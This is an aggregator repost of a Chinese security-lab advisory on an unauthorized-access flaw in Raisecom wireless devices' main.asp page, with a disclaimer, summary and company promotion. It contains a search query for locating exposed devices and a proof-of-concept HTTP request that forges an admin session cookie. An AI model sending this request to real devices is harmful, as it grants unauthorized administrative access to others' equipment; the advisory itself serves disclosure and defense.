今天看啥  ›  专栏  ›  融云攻防实验室

漏洞预警 瑞斯康达 wireless main.asp 未授权访问漏洞

融云攻防实验室  · 公众号  ·  · 2024-10-28 15:49
    

主要观点总结

本文首先声明技术文章仅供参考,并提醒未经授权不得利用文中技术进行入侵操作。接着描述了瑞斯康达 wireless main.asp 存在未授权访问漏洞,并提供了一些细节和步骤来复现漏洞。最后介绍了江西渝融云安全科技有限公司的一些基本信息,包括其服务、资质荣誉等。

关键观点总结

关键观点1: 技术文章用途及免责声明

文章提供的信息仅供网络安全人员检测或维护网站、服务器时参考,未经授权不得用于入侵操作,否则后果自负。

关键观点2: 关于瑞斯康达 wireless main.asp 的漏洞描述

文章中提到了瑞斯康达 wireless main.asp 存在未授权访问漏洞,并给出了具体的漏洞复现步骤。

关键观点3: nuclei验证脚本的使用

文章提到了使用nuclei验证脚本来进行漏洞验证,并给出了具体的命令用法。

关键观点4: 公司简介及荣誉

文章介绍了江西渝融云安全科技有限公司的基本信息,包括其服务、资质荣誉等,并强调了其专业性和实力。


文章预览

0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! 0x02 漏洞描述 瑞斯康达 wireless main.asp 存在未授权访问漏洞。 0x03 漏洞复现 banner="Server: INP httpd" || header="Server: INP httpd" 1.执行poc进行未授权访问,得到结果 GET /main.asp HTTP/1.1 Host : User-Agent : Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Ge cko/20100101 Firefox/56.0 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie : sessionid=admin Accept-Encoding : gzip, deflate X-Requested-With : XMLHttpRequest 2.nuclei验证脚本已发布 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览